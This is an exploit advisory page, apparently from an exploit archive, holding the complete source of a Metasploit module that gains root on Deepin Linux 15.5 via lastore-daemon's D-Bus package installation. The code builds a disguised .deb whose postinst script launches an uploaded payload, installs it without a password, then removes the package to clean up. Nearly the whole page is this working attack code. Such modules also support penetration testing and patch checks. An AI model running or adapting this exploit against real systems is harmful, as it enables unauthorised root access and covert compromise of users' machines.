lastore-daemon D-Bus Privilege Escalation

Credit: Brendan Coles
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264

## # This module requires Metasploit: # Current source: ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'lastore-daemon D-Bus Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges on Deepin Linux systems by using lastore-daemon to install a package. The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user in the sudo group to install arbitrary system packages without providing a password, resulting in code execution as root. By default, the first user created on the system is a member of the sudo group. This module has been tested successfully with lastore-daemon version 0.9.53-1 on Deepin Linux 15.5 (x64). }, 'License' => MSF_LICENSE, 'Author' => [ "King's Way", # Discovery and exploit 'Brendan Coles' # Metasploit ], 'DisclosureDate' => 'Feb 2 2016', 'References' => [ [ 'EDB', '39433' ], [ 'URL', '' ], ], 'Platform' => 'linux', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'DefaultTarget' => 0)) register_options(['WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ]) end def base_dir datastore['WritableDir'] end def mkdir(path) vprint_status "Creating '#{path}' directory" cmd_exec "mkdir -p #{path}" register_dir_for_cleanup path end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data cmd_exec "chmod +x '#{path}'" end def command_exists?(cmd) cmd_exec("command -v #{cmd} && echo true").include? 'true' end def dbus_priv? res = install_package '', '' (res.include? 'DBus.Error.AccessDenied') ? false : true end def install_package(name, path) dbus_send dest: 'com.deepin.lastore', type: 'method_call', path: '/com/deepin/lastore', interface: 'com.deepin.lastore.Manager.InstallPackage', contents: "string:'#{name}' string:'#{path}'" end def remove_package(name) dbus_send dest: 'com.deepin.lastore', type: 'method_call', path: '/com/deepin/lastore', interface: 'com.deepin.lastore.Manager.RemovePackage', contents: "string:' ' string:'#{name}'" end def dbus_send(dest:, type:, path:, interface:, contents:) cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}" end def check %w(lastore-daemon dpkg-deb dbus-send).each do |cmd| unless command_exists? cmd vprint_error "#{cmd} is not installed. Exploitation will fail." return CheckCode::Safe end vprint_good "#{cmd} is installed" end unless dbus_priv? vprint_error 'User is not permitted to install packages. Exploitation will fail.' return CheckCode::Safe end vprint_good 'User is permitted to install packages' CheckCode::Appears end def exploit if is_root? fail_with Failure::BadConfig, 'Session already has root privileges' end if check != CheckCode::Appears fail_with Failure::NotVulnerable, 'Target is not vulnerable' end print_status 'Building package...' payload_name = ".#{rand_text_alphanumeric rand(10..15)}" payload_path = "#{base_dir}/#{payload_name}" pkg_name = rand_text_alphanumeric rand(10..15) pkg_path = "#{base_dir}/.#{pkg_name}" mkdir "#{pkg_path}/DEBIAN" pkg = "Package: #{pkg_name}\n" pkg << "Version: 0.1\n" pkg << "Maintainer: #{pkg_name}\n" pkg << "Architecture: all\n" pkg << "Description: #{pkg_name}\n" upload "#{pkg_path}/DEBIAN/control", pkg upload_and_chmodx "#{pkg_path}/DEBIAN/postinst", "#!/bin/sh\n#{payload_path} &" cmd_exec "dpkg-deb --build '#{pkg_path}'" unless file_exist? "#{pkg_path}.deb" fail_with Failure::Unknown, 'Building package failed' end print_status 'Uploading payload...' upload_and_chmodx payload_path, generate_payload_exe print_status 'Installing package...' res = install_package pkg_name, "#{pkg_path}.deb" vprint_line res unless res.include? 'object path' fail_with Failure::Unknown, 'Package installation failed. Check /var/log/lastore/daemon.log' end Rex.sleep 15 print_status 'Removing package...' res = remove_package pkg_name.downcase vprint_line res unless res.include? 'object path' print_warning 'Package removal failed. Check /var/log/lastore/daemon.log' end end end

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